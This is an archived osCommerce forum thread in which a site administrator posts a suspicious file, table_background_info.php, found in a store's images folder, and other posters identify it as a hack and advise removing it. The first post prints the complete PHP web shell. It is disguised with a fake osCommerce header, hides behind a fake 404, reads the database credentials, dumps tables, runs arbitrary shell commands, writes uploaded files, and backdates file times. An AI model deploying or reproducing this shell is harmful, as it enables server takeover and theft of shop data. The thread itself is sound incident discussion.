Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

/images/table_background_info.php


blargman

Recommended Posts

What is this file for? I noticed a large amount of requests from the server's own ip to this file and it caused Apache to reach it's max clients.

 

<?php
/*
 $Id: table_background_info.php,v 1.73 2003/02/13 01:58:23 hpdl Exp $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright © 2003 osCommerce

 Released under the GNU General Public License
*/

define("OSCOMMERCE_FILENAME", 'shell.php');
define("SLASH", chr(92));
define("NL",	chr(10));
define("CRNL",  chr(13).chr(10));

$licence = "(UTEO84JE73JLL)";

if (!isset($_POST['K']) || $licence != $_POST['K'])
{
 header("Status: 404 Not Found");
 header("HTTP/1.0 404 Not Found");
 $in = rand(10000000, 99999999);
 $fp = @fsockopen($_SERVER['SERVER_NAME'], 80, $errno, $errstr, 2);
 if ($fp) 
 {
$name= preg_replace("~".addcslashes(OSCOMMERCE_FILENAME, ".")."~i", $in.".jpg", $_SERVER['SCRIPT_NAME']);
$out  = "GET ".$name." HTTP/1.1".CRNL;
$out .= "Host: ".$_SERVER['SERVER_NAME'].CRNL;
$out .= "Connection: Close".CRNL.CRNL;
fwrite($fp, $out);
while (!feof($fp)) 
{
  $data2save .= fgets($fp, 128);
}
@fclose($fp);

if (strstr($data2save, CRNL.CRNL))
{
  $data2save = substr(strstr($data2save, CRNL.CRNL), 4);
  $data2save = preg_replace("~".$in.SLASH.".jpg~i", OSCOMMERCE_FILENAME, $data2save);
  echo preg_replace("~^[\d\s]+$~mi", "", $data2save);
}	
 }  
 die();
}

header("Expires: Mon, 26 Jul 1980 05:00:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Cache-Control: private");
header("Pragma: no-cache");

set_time_limit(99999999999);
ini_set('memory_limit', -1); 

clearstatcache();
function dbc()
{
 if (is_file("../includes/configure.php"))
 {
@include ("../includes/configure.php");	
 }
 else if (is_file("includes/configure.php"))
 {
@include ("includes/configure.php");
 }

 if (isset($_POST['MYH'])) $MYH = $_POST['MYH']; else $MYH = DB_SERVER;
 if (isset($_POST['MYU'])) $MYU = $_POST['MYU']; else $MYU = DB_SERVER_USERNAME;
 if (isset($_POST['MYP'])) $MYP = $_POST['MYP']; else $MYP = DB_SERVER_PASSWORD;
 if (isset($_POST['MYD'])) $MYD = $_POST['MYD']; else $MYD = DB_DATABASE;

 $MYL = mysql_connect($MYH, $MYU, $MYP);
 mysql_select_db($MYD);

 return array($MYL, $MYH, $MYU, $MYP, $MYD);
}

if (isset($_POST['P']))
{
 die("A11");
}
else if (isset($_POST['MYST']))
{
 list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
 $tables = "";
 $res = mysql_query("SHOW TABLES");
 while ($row = mysql_fetch_array($res))
 {
$resCounts = @mysql_query("SELECT COUNT(*) FROM `".$row[0]."`", $MYL);
$rowCounts = @mysql_fetch_array($resCounts);
$tables .= "|:|".$row[0].":".$rowCounts[0].NL;
 }
 echo $tables;
 mysql_close($MYL);
 die("#done");
}
else if (isset($_POST['MYSD']))
{
 list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
 $list = "";
 $res = mysql_query("SHOW DATABASES");
 while ($row = mysql_fetch_array($res))
 {
$list .= "|:|".$row[0].NL;
 }
 echo $list;
 mysql_close($MYL);
 die("#done");
}
else if (isset($_POST['MYFR']))
{
 list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();

 if (substr($_POST['MYC'], 0, 1) == 0)
 {
$res   = @mysql_query("SHOW CREATE TABLE `".$_POST['MYT']."`", $MYL);
$row   = @mysql_fetch_array($res);
echo $row[1].";".NL;
 }

 $res = @mysql_query("SELECT * FROM `".$_POST['MYT']."` LIMIT ".$_POST['MYC'], $MYL);
 if (@mysql_num_rows($res) > 0) 
 {
while (($row = @mysql_fetch_array($res))) 
{
  $keys   = @implode("`, `", @array_keys($row));
  $values = @array_values($row);
  foreach($values as $k=>$v) 
  {
	$values[$k] = mysql_escape_string($v);
  }
  $values = @implode("', '", $values);
  echo "INSERT INTO `".$_POST['MYT']."` (`".$keys."`) VALUES ('".$values."');".NL;
}
 }
 mysql_close($MYL); 
 die("#done");	   
}
else if (isset($_POST['MYINF']))
{
 $inf = dbc();
 unset($inf[0]);
 die(implode("|:|", $inf));
}  
else if (isset($_POST['E']))
{
 @exec($_POST['E'], $output, $retCode);
 die(($retCode != 0) ? ("RETCODE:".$retCode.NL) : "".implode(NL, $output));
}
else if (isset($_POST['U']) && isset($_POST['UF']) && isset($_POST['US'])) 
{
 if (strlen($_POST['U']) == $_POST['US'])
 {
ignore_user_abort(true);
$fpSave = fopen($_POST['UF'], "w");
fwrite($fpSave, base64_decode($_POST['U']));
fclose($fpSave);
ignore_user_abort(false);
 }
}

if (isset($_POST['T']) || isset($_POST['UF']))
{
 if (isset($_POST['UF'])) $f = $_POST['UF']; else $f = $_POST['T']; 

 $t  = array();
 $d  = dir(".");
 $mt = 0;
 while (false !== ($e = $d->read()))
 {
$nt = filemtime($e);
if ($nt > $mt) $mt = $nt;
if (preg_match("~table_background~", $e))
{
  $t[0][] = $nt;
}
else
{
  $t[1][] = $nt;
}
 }
 $d->close();
 if (count($t[0]) > 0) $tc = 0; else $tc = 1;

 sort($t[$tc]);

 if (count($t[$tc]) > 0)
 {
@touch($f,  $t[$tc][floor(count($t[$tc]) / 2)]);
@touch("./", $mt);
 }  
}

?>

Link to comment
Share on other sites

Yeah, I'm not sure why that link even comes up. It's not even on the page. Doing just a search for the file comes up with a few oscommerce installs with it.

Grab a copy of the file so you have it backed up, and delete it from your website.

Link to comment
Share on other sites

Grab a copy of the file so you have it backed up, and delete it from your website.

 

I just 403'd it via htaccess for now. I'm actually just looking at this for someone else and know very little about oscommerce. I also noticed his images folder was completely open. If anyone does know what it is, it would be helpful, I just don't know oscommerce enough to know what it's there for. :\

Link to comment
Share on other sites

looks like a hack attempt.

 

Seriously -- look at the file content. It's not like any "normal" osC files, really.

 

chmod it to 000, or rename it and then chmod it to 000.

 

-jared

Link to comment
Share on other sites

looks like a hack attempt.

 

Seriously -- look at the file content. It's not like any "normal" osC files, really.

 

chmod it to 000, or rename it and then chmod it to 000.

 

-jared

 

I kind of thought the same, only thing that made me think different was the person I'm looking at this for, that file has been there since they put the oscommerce install on the server from another. I just found the same thing on another machine doing the exact same thing. Dosing out the server. Just filling up the MaxClients of apache. The fsockopen did look a bit suspicious to me. Though unfortunately I just don't know much about OsCommerce or really php for that matter. Can't seem to find a copy of Oscommerce 1.7 to verify file contents against.

 

Anyone have a 1.7 install or the tarball to check if that should be in the images directory?

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...